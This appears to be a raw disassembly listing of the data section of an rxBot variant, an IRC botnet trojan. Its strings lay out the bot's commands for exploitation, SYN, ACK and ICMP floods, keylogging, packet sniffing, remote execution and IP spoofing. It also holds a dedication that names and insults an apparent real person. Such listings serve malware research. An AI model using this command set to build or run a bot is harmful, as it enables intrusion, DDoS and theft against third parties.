dword_440C90 dd 7325h ; DATA XREF: sub_401C87+27C8�o
dword_440C94 dd 234032Dh, 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh
; DATA XREF: sub_401C87+27FB�o
dd 2E676Fh
unk_440CAC db 2Dh ; - ; DATA XREF: sub_401C87+2872�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToStar_6 db '- Failed to start listing thread, error: <%d>.',0
dword_440CE4 dd 234032Dh, 6E69616Dh, 202D0302h, 61696C41h, 696C2073h
; DATA XREF: sub_401C87+28A2�o
dd 2E7473h
dword_440CFC dd 627573h ; DATA XREF: sub_401C87+28F4�o
dword_440D00 dd 234032Dh, 65726874h, 2736461h, 4C202D03h, 20747369h
; DATA XREF: sub_401C87+291A�o
dd 65726874h, 2E736461h, 0
unk_440D20 db 2Dh ; - ; DATA XREF: sub_401C87+2973�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToStar_7 db '- Failed to start list thread, error: <%d>.',0
align 4
dword_440D5C dd 234032Dh, 6E69616Dh, 202D0302h, 20746F42h, 203A4449h
; DATA XREF: sub_401C87+29AC�o
dd 2E7325h
unk_440D74 db 2Dh ; - ; DATA XREF: sub_401C87+29EA�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aStatusReady_Bo db 'Status: Ready. Bot Uptime: %s.',0
align 10h
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+2A36�o
align 4
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401C87:loc_4046CF�o
align 4
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401C87:loc_4046E6�o
align 4
dword_440DD4 dd 234032Dh, 6E69616Dh, 202D0302h, 63736944h, 656E6E6Fh
; DATA XREF: sub_401C87+2A6C�o
dd 6E697463h, 2E67h
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401C87:loc_404708�o
align 4
dword_440E08 dd 234032Dh, 6E69616Dh, 202D0302h, 6F636552h, 63656E6Eh
; DATA XREF: sub_401C87+2A8E�o
dd 676E6974h, 2Eh
dword_440E24 dd 636F7250h, 20737365h, 7473696Ch, 0 ; DATA XREF: sub_401C87+2B01�o
dword_440E34 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_401C87+2B06�o
dword_440E44 dd 646E6946h, 6C696620h, 65h ; DATA XREF: sub_401C87+2B19�o
dword_440E50 dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_401C87+2B1E�o
dword_440E60 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401C87+2BD1�o
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_440E88 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401C87+2C2A�o
aFailedToStar_8 db '- Failed to start server thread, error: <%d>.',0
align 4
unk_440EC4 db 2Dh ; - ; DATA XREF: sub_401C87+2CC1�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on: %s:%d.',0
align 10h
unk_440EF0 db 2Dh ; - ; DATA XREF: sub_401C87+2D2F�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToStar_9 db ' Failed to start server thread, error: <%d>.',0
align 10h
aSecure_0 db 'secure',0 ; DATA XREF: sub_401C87+2D4F�o
align 4
aSec_0 db 'sec',0 ; DATA XREF: sub_401C87+2D60�o
aSecuring db 'Securing',0 ; DATA XREF: sub_401C87+2DBB�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_401C87+2DC2�o
align 4
dword_440F54 dd 234032Dh, 75636573h, 3026572h, 7325202Dh, 73797320h
; DATA XREF: sub_401C87+2DC8�o
dd 2E6D6574h, 0
dword_440F70 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_401C87+2E2C�o
aFailedToSta_10 db '- Failed to start secure thread, error: <%d>.',0
align 10h
unk_440FB0 db 2Dh ; - ; DATA XREF: sub_401C87:loc_404AEB�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aThisModOfRxbot db 'This mod of rxBot is dedicated to Pia Gerhardt (nameless@efnet/ir'
db 'cnet), the Beautiful Operatress from Heaven (or Bitch Operatress '
db 'from Hell?) who I love so much.',0
align 10h
dword_441060 dd 234032Dh, 6E69616Dh, 202D0302h, 7325h ; DATA XREF: sub_401C87+2E73�o
unk_441070 db 2Dh ; - ; DATA XREF: sub_401C87+2EB1�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_1 db 'User %s logged out.',0
unk_441090 db 2Dh ; - ; DATA XREF: sub_401C87+2EC4�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNoUserLoggedIn db 'No user logged in at slot: %d.',0
align 4
unk_4410BC db 2Dh ; - ; DATA XREF: sub_401C87+2ECF�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aInvalidLoginSl db 'Invalid login slot number: %d.',0
align 4
unk_4410E8 db 2Dh ; - ; DATA XREF: sub_401C87+2F11�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_2 db 'User %s logged out.',0
a332_1 db '332',0 ; DATA XREF: sub_401C87+2F21�o
aGet_2 db 'get',0 ; DATA XREF: sub_401C87:loc_404BC8�o
unk_441110 db 2Dh ; - ; DATA XREF: sub_401C87+2F63�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 4
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_401C87+2FBC�o
align 4
unk_441154 db 2Dh ; - ; DATA XREF: sub_401C87+2FD4�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurr_0 db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 4
unk_44118C db 2Dh ; - ; DATA XREF: sub_401C87+2FF4�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
unk_4411C0 db 2Dh ; - ; DATA XREF: sub_401C87+301E�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 4
aExploit db 'exploit',0 ; DATA XREF: sub_401C87+303C�o
unk_4411F4 db 2Dh ; - ; DATA XREF: sub_401C87+30B9�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
unk_441224 db 2Dh ; - ; DATA XREF: sub_401C87+3115�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_401C87+3135�o
align 4
aRin db 'rin',0 ; DATA XREF: sub_401C87+314A�o
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_401C87+315F�o
aRinms db 'rinms',0 ; DATA XREF: sub_401C87+3174�o
align 10h
aFlood db 'flood',0 ; DATA XREF: sub_401C87+318B�o
align 4
aLoad db 'load',0 ; DATA XREF: sub_401C87+31B4�o
align 10h
unk_4412A0 db 2Dh ; - ; DATA XREF: sub_401C87+3208�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aSClonesLoadedT db '- %s clones loaded to %s:%s',0
align 4
aPm_1 db 'pm',0 ; DATA XREF: sub_401C87+323A�o
align 10h
a__6: ; DATA XREF: sub_401C87+3255�o
; sub_401C87+325A�o
unicode 0, < _>
aPrivmsgSS_3 db 'privmsg %s :%s',0 ; DATA XREF: sub_401C87+3286�o
align 4
aCt db 'ct',0 ; DATA XREF: sub_401C87+32A3�o
align 4
a__7: ; DATA XREF: sub_401C87+32BE�o
; sub_401C87+32C3�o
unicode 0, < _>
dword_4412EC dd 76697270h, 2067736Dh, 3A207325h, 1732501h, 0
; DATA XREF: sub_401C87+32EF�o
dword_441300 dd 746Eh ; DATA XREF: sub_401C87+330C�o
byte_441304 db 20h, 0 ; DATA XREF: sub_401C87+3327�o
word_441306 dw 5Fh ; DATA XREF: sub_401C87+332C�o
dword_441308 dd 69746F6Eh, 25206563h, 253A2073h, 73h ; DATA XREF: sub_401C87+3358�o
aMode db 'mode',0 ; DATA XREF: sub_401C87+3375�o
align 2
asc_44131E db ' ',0 ; DATA XREF: sub_401C87+3390�o
a_: ; DATA XREF: sub_401C87+3395�o
unicode 0, <_>,0
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_401C87+33C1�o
align 10h
aJoin db 'join',0 ; DATA XREF: sub_401C87+33DE�o
align 4
aJoinS db 'join %s',0 ; DATA XREF: sub_401C87+3400�o
aPart_1 db 'part',0 ; DATA XREF: sub_401C87+341D�o
align 4
aPartS db 'part %s',0 ; DATA XREF: sub_401C87+343F�o
aPartflood db 'partflood',0 ; DATA XREF: sub_401C87+345C�o
align 4
aPartSS db 'part %s %s',0 ; DATA XREF: sub_401C87+3483�o
align 4
aPnick db 'pnick',0 ; DATA XREF: sub_401C87+34A0�o
align 10h
aSI db '%s%i',0 ; DATA XREF: sub_401C87+34E0�o
align 4
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_401C87+34F8�o
aJoinPart db 'join/part',0 ; DATA XREF: sub_401C87+3515�o
align 4
aJoinS_0 db 'join %s',0 ; DATA XREF: sub_401C87+3543�o
aPartSS_0 db 'part %s %s',0 ; DATA XREF: sub_401C87+356C�o
align 10h
aJoinS_1 db 'join %s',0 ; DATA XREF: sub_401C87+35A3�o
aPartSS_1 db 'part %s %s',0 ; DATA XREF: sub_401C87+35DF�o
align 4
aJoinS_2 db 'join %s',0 ; DATA XREF: sub_401C87+3603�o
aPartSS_2 db 'part %s %s',0 ; DATA XREF: sub_401C87+363F�o
align 4
aDcc db 'dcc',0 ; DATA XREF: sub_401C87+365C�o
dword_4413CC dd 56495250h, 2047534Dh, 3A207325h, 43434401h, 4E455320h
; DATA XREF: sub_401C87+36D9�o
dd 64252044h, 2064252Eh, 25206425h, 64252064h, 1
aNick_0 db 'nick',0 ; DATA XREF: sub_401C87+36F6�o
align 4
aJoinS_3 db 'join %s',0 ; DATA XREF: sub_401C87+3720�o
aNickS_1 db 'NICK %s',0 ; DATA XREF: sub_401C87+3750�o
aNickS_2 db 'NICK %s',0 ; DATA XREF: sub_401C87+3793�o
aNickS_3 db 'NICK %s',0 ; DATA XREF: sub_401C87+37D6�o
aChgnick db 'chgnick',0 ; DATA XREF: sub_401C87+37F3�o
aNickS_4 db 'NICK %s',0 ; DATA XREF: sub_401C87+381C�o
aMsg db 'msg',0 ; DATA XREF: sub_401C87+3839�o
aJoinS_4 db 'join %s',0 ; DATA XREF: sub_401C87+3867�o
aPrivmsgSS db 'privmsg %s :%s',0 ; DATA XREF: sub_401C87+3890�o
align 4
aPrivmsgSS_0 db 'privmsg %s :%s',0 ; DATA XREF: sub_401C87+38CC�o
align 4
aPrivmsgSS_1 db 'privmsg %s :%s',0 ; DATA XREF: sub_401C87+3908�o
align 4
aNotice_2 db 'notice',0 ; DATA XREF: sub_401C87+3925�o
align 10h
aJoinS_5 db 'join %s',0 ; DATA XREF: sub_401C87+3953�o
aNoticeSS_1 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401C87+397C�o
align 4
aNoticeSS_2 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401C87+39B8�o
align 4
aNoticeSS_3 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401C87+39F4�o
align 4
aCtcp db 'ctcp',0 ; DATA XREF: sub_401C87+3A11�o
align 10h
aJoinS_6 db 'join %s',0 ; DATA XREF: sub_401C87+3A3F�o
dword_4414B8 dd 56495250h, 2047534Dh, 3A207325h, 6E697001h, 167h
; DATA XREF: sub_401C87+3A63�o
dword_4414CC dd 56495250h, 2047534Dh, 3A207325h, 72657601h, 6E6F6973h
; DATA XREF: sub_401C87+3A9A�o
dd 1
dword_4414E4 dd 56495250h, 2047534Dh, 3A207325h, 6E696601h, 1726567h
; DATA XREF: sub_401C87+3AD1�o
dd 0
dword_4414FC dd 56495250h, 2047534Dh, 3A207325h, 6E696601h, 1726567h
; DATA XREF: sub_401C87+3B08�o
dd 0
dword_441514 dd 78696Dh ; DATA XREF: sub_401C87+3B25�o
dword_441518 dd 6E696F6Ah, 732520h ; DATA XREF: sub_401C87+3B53�o
dword_441520 dd 56495250h, 2047534Dh, 3A207325h, 6E697001h, 167h
; DATA XREF: sub_401C87+3B77�o
dword_441534 dd 49544F4Eh, 25204543h, 253A2073h, 73h ; DATA XREF: sub_401C87+3BB3�o
dword_441544 dd 56495250h, 2047534Dh, 3A207325h, 7325h ; DATA XREF: sub_401C87+3BEF�o
dword_441554 dd 49544F4Eh, 25204543h, 253A2073h, 73h ; DATA XREF: sub_401C87+3C2B�o
aRegister db 'register',0 ; DATA XREF: sub_401C87+3C48�o
align 10h
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_401C87+3C71�o
aOff_0 db 'off',0 ; DATA XREF: sub_401C87+3C8E�o
unk_44158C db 2Dh ; - ; DATA XREF: sub_401C87+3CD5�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
aNick_1 db 'nick',0 ; DATA XREF: sub_401C87+3CF4�o
align 2
aN db 'n',0 ; DATA XREF: sub_401C87+3D09�o
aJoin_0 db 'join',0 ; DATA XREF: sub_401C87+3D1E�o
align 2
aJ db 'j',0 ; DATA XREF: sub_401C87+3D33�o
aPart_2 db 'part',0 ; DATA XREF: sub_401C87+3D48�o
align 4
aPt db 'pt',0 ; DATA XREF: sub_401C87+3D5D�o
align 10h
aRaw db 'raw',0 ; DATA XREF: sub_401C87+3D72�o
aR_0: ; DATA XREF: sub_401C87+3D87�o
unicode 0, <r>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_401C87+3D9C�o
align 4
aK: ; DATA XREF: sub_401C87+3DB1�o
unicode 0, <k>,0
aC_quit db 'c_quit',0 ; DATA XREF: sub_401C87+3DC6�o
align 10h
aC_q db 'c_q',0 ; DATA XREF: sub_401C87+3DDB�o
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_401C87+3DF0�o
align 10h
aC_rn db 'c_rn',0 ; DATA XREF: sub_401C87+3E05�o
align 4
aPrefix db 'prefix',0 ; DATA XREF: sub_401C87+3E1A�o
align 10h
aPr db 'pr',0 ; DATA XREF: sub_401C87+3E2F�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401C87+3E44�o
align 2
aO db 'o',0 ; DATA XREF: sub_401C87+3E59�o
aServer_0 db 'server',0 ; DATA XREF: sub_401C87+3E6E�o
align 4
aSe db 'se',0 ; DATA XREF: sub_401C87+3E83�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_401C87+3E98�o
aDn db 'dn',0 ; DATA XREF: sub_401C87+3EAD�o
align 10h
aKillproc db 'killproc',0 ; DATA XREF: sub_401C87+3EC2�o
align 4
aKp db 'kp',0 ; DATA XREF: sub_401C87+3ED7�o
align 10h
aKill db 'kill',0 ; DATA XREF: sub_401C87+3EEC�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_401C87+3F01�o
align 4
aDelete db 'delete',0 ; DATA XREF: sub_401C87+3F16�o
align 4
aDel db 'del',0 ; DATA XREF: sub_401C87+3F2B�o
aGet db 'get',0 ; DATA XREF: sub_401C87+3F40�o
aGt db 'gt',0 ; DATA XREF: sub_401C87+3F55�o
align 10h
aList db 'list',0 ; DATA XREF: sub_401C87+3F6A�o
align 4
aLi db 'li',0 ; DATA XREF: sub_401C87+3F7F�o
align 4
aVisit db 'visit',0 ; DATA XREF: sub_401C87+3F94�o
aV db 'v',0 ; DATA XREF: sub_401C87+3FA9�o
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_401C87+3FBE�o
aMirc db 'mirc',0 ; DATA XREF: sub_401C87+3FD3�o
align 4
aCmd db 'cmd',0 ; DATA XREF: sub_401C87+3FE8�o
aCm db 'cm',0 ; DATA XREF: sub_401C87+3FFD�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_401C87+4012�o
align 4
aRf db 'rf',0 ; DATA XREF: sub_401C87+4027�o
align 4
aPsniff db 'psniff',0 ; DATA XREF: sub_401C87+403C�o
align 4
aOn db 'on',0 ; DATA XREF: sub_401C87+4053�o
align 4
dword_4416A8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401C87+4073�o
aAlreadyRunni_1 db '- Already running.',0
align 4
dword_4416C8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401C87+40D7�o
aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 4
dword_4416F8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401C87+4130�o
aFailedToSta_11 db '- Failed to start sniffer thread, error: <%d>.',0
align 4
aOff_2 db 'off',0 ; DATA XREF: sub_401C87+4152�o
dword_441738 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401C87+4175�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 4
dword_441774 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401C87:loc_405E06�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 10h
aSniffer db 'sniffer',0 ; DATA XREF: sub_401C87+418A�o
aOn_0 db 'on',0 ; DATA XREF: sub_401C87+41A1�o
align 4
unk_4417AC db 2Dh ; - ; DATA XREF: sub_401C87+41C1�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_2 db '- Already running.',0
unk_4417CC db 2Dh ; - ; DATA XREF: sub_401C87+4225�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotPacketS db '- Phatbot packet sniffer active.',0
align 4
unk_4417FC db 2Dh ; - ; DATA XREF: sub_401C87+427E�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_12 db '- Failed to start sniffer thread, error: <%d>.',0
aOff_3 db 'off',0 ; DATA XREF: sub_401C87+42A0�o
align 10h
unk_441840 db 2Dh ; - ; DATA XREF: sub_401C87+42C3�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotSniffer db '- Phatbot sniffer stopped. (%d thread(s) stopped.)',0
unk_441880 db 2Dh ; - ; DATA XREF: sub_401C87:loc_405F54�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoPhatbotSniff db '- No Phatbot sniffer thread found.',0
aIdent db 'ident',0 ; DATA XREF: sub_401C87+42D8�o
align 4
aOn_1 db 'on',0 ; DATA XREF: sub_401C87+42EF�o
align 4
dword_4418BC dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401C87+4311�o
aAlreadyRunni_3 db '- Already running.',0
align 4
dword_4418DC dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401C87:loc_405FA2�o
aServerRunnin_0 db '- Server running on Port: 113.',0
align 4
dword_441908 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401C87+4368�o
aFailedToSta_13 db '- Failed to start server, error: <%d>.',0
align 4
aOff_4 db 'off',0 ; DATA XREF: sub_401C87+4375�o
dword_441940 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401C87+4398�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 4
dword_441978 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401C87:loc_406029�o
aNoThreadFound_ db '- No thread found.',0
align 4
aKeylog db 'keylog',0 ; DATA XREF: sub_401C87+43AD�o
align 10h
aOn_2 db 'on',0 ; DATA XREF: sub_401C87+43C5�o
align 4
aFile db 'file',0 ; DATA XREF: sub_401C87+43D6�o
align 4
aOff_1 db 'off',0 ; DATA XREF: sub_401C87+43E7�o
dword_4419B0 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401C87+440A�o
aKeyLoggerStopp db '- Key logger stopped. (%d thread(s) stopped.)',0
align 4
dword_4419EC dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401C87:loc_40609B�o
aNoKeyLoggerThr db '- No key logger thread found.',0
align 4
dword_441A18 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401C87+442A�o
aAlreadyRunni_4 db '- Already running.',0
align 4
aFile_0 db 'file',0 ; DATA XREF: sub_401C87+4441�o
align 10h
dword_441A40 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401C87+44AB�o
aKeyLoggerActiv db '- Key logger active.',0
align 4
dword_441A64 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401C87+4504�o
aFailedToSta_14 db '- Failed to start logging thread, error: <%d>.',0
align 10h
aNet db 'net',0 ; DATA XREF: sub_401C87+4533�o
unk_441AA4 db 2Dh ; - ; DATA XREF: sub_401C87+4557�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
aStart db 'start',0 ; DATA XREF: sub_401C87+4589�o
align 4
aS_1 db '%s',0 ; DATA XREF: sub_401C87+45A8�o
align 4
unk_441AE8 db 2Dh ; - ; DATA XREF: sub_401C87+45DF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 4
unk_441B0C db 2Dh ; - ; DATA XREF: sub_401C87:loc_406270�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
aStop db 'stop',0 ; DATA XREF: sub_401C87+45F6�o
align 4
aS_2 db '%s',0 ; DATA XREF: sub_401C87+4611�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_401C87+461B�o
align 10h
aS_3 db '%s',0 ; DATA XREF: sub_401C87+4636�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_401C87+4643�o
align 10h
aS_4 db '%s',0 ; DATA XREF: sub_401C87+465E�o
align 4
aDelete_0 db 'delete',0 ; DATA XREF: sub_401C87+466B�o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_401C87+4686�o
align 10h
aShare db 'share',0 ; DATA XREF: sub_401C87+4693�o
align 4
aS_6 db '%s',0 ; DATA XREF: sub_401C87+46B9�o
align 4
aS_7 db '%s',0 ; DATA XREF: sub_401C87+46CF�o
align 10h
unk_441B70 db 2Dh ; - ; DATA XREF: sub_401C87+4707�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 4
unk_441B94 db 2Dh ; - ; DATA XREF: sub_401C87:loc_406398�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 4
aUser_0 db 'user',0 ; DATA XREF: sub_401C87+471E�o
align 4
aS_8 db '%s',0 ; DATA XREF: sub_401C87+4754�o
align 10h
aS_9 db '%s',0 ; DATA XREF: sub_401C87+476F�o
align 4
aS_10 db '%s',0 ; DATA XREF: sub_401C87+4780�o
align 4
unk_441BC8 db 2Dh ; - ; DATA XREF: sub_401C87+47B8�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_441BE8 db 2Dh ; - ; DATA XREF: sub_401C87:loc_406446�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 4
aSend db 'send',0 ; DATA XREF: sub_401C87+47C9�o
align 10h
aS_11 db '%s',0 ; DATA XREF: sub_401C87+47F8�o
align 4
unk_441C14 db 2Dh ; - ; DATA XREF: sub_401C87:loc_406492�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 4
unk_441C38 db 2Dh ; - ; DATA XREF: sub_401C87:loc_406499�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
aCapture db 'capture',0 ; DATA XREF: sub_401C87+482B�o
aCap db 'cap',0 ; DATA XREF: sub_401C87+4840�o
aGethost db 'gethost',0 ; DATA XREF: sub_401C87+4855�o
aGh db 'gh',0 ; DATA XREF: sub_401C87+486A�o
align 4
aKilllog db 'killlog',0 ; DATA XREF: sub_401C87+4893�o
aKl db 'kl',0 ; DATA XREF: sub_401C87+48AA�o
align 4
aAddalias db 'addalias',0 ; DATA XREF: sub_401C87+48C1�o
align 4
aAa db 'aa',0 ; DATA XREF: sub_401C87+48D8�o
align 4
aPrivmsg_1 db 'privmsg',0 ; DATA XREF: sub_401C87+48EF�o
aPm db 'pm',0 ; DATA XREF: sub_401C87+4906�o
align 4
aAction db 'action',0 ; DATA XREF: sub_401C87+491D�o
align 4
aA: ; DATA XREF: sub_401C87+4934�o
unicode 0, <a>,0
aCycle db 'cycle',0 ; DATA XREF: sub_401C87+494B�o
align 4
aCy db 'cy',0 ; DATA XREF: sub_401C87+4962�o
align 4
aMode_0 db 'mode',0 ; DATA XREF: sub_401C87+4979�o
align 2
aM db 'm',0 ; DATA XREF: sub_401C87+4990�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_401C87+49A7�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_401C87+49BE�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_401C87+49D5�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_401C87+49EC�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_401C87+4A03�o
align 4
aC_n db 'c_n',0 ; DATA XREF: sub_401C87+4A1A�o
aC_join db 'c_join',0 ; DATA XREF: sub_401C87+4A31�o
align 10h
aC_j db 'c_j',0 ; DATA XREF: sub_401C87+4A48�o
aC_part db 'c_part',0 ; DATA XREF: sub_401C87+4A5F�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_401C87+4A76�o
aTarga3 db 'targa3',0 ; DATA XREF: sub_401C87+4A8D�o
align 4
aT3 db 't3',0 ; DATA XREF: sub_401C87+4AA4�o
align 4
aTsunami db 'tsunami',0 ; DATA XREF: sub_401C87+4ABB�o
aTsn db 'tsn',0 ; DATA XREF: sub_401C87+4AD2�o
aRepeat db 'repeat',0 ; DATA XREF: sub_401C87+4AE9�o
align 10h
aRp db 'rp',0 ; DATA XREF: sub_401C87+4B00�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_401C87+4B17�o
align 4
aDe db 'de',0 ; DATA XREF: sub_401C87+4B2E�o
align 10h
aUpdate db 'update',0 ; DATA XREF: sub_401C87+4B45�o
align 4
aUp_0 db 'up',0 ; DATA XREF: sub_401C87+4B5C�o
align 4
aExecute db 'execute',0 ; DATA XREF: sub_401C87+4B73�o
aE: ; DATA XREF: sub_401C87+4B8A�o
unicode 0, <e>,0
aFindfile db 'findfile',0 ; DATA XREF: sub_401C87+4BA1�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_401C87+4BB8�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_401C87+4BCF�o
align 10h
aMv db 'mv',0 ; DATA XREF: sub_401C87+4BE6�o
align 4
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_401C87+4BFD�o
align 10h
aIcmp db 'icmp',0 ; DATA XREF: sub_401C87+4C14�o
align 4
aClone_0 db 'clone',0 ; DATA XREF: sub_401C87+4C3D�o
aC db 'c',0 ; DATA XREF: sub_401C87+4C54�o
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_401C87+4C6B�o
align 4
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_401C87+4C82�o
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_401C87+4C99�o
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_401C87+4CB0�o
align 10h
unk_441DA0 db 2Dh ; - ; DATA XREF: sub_401C87+4D71�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
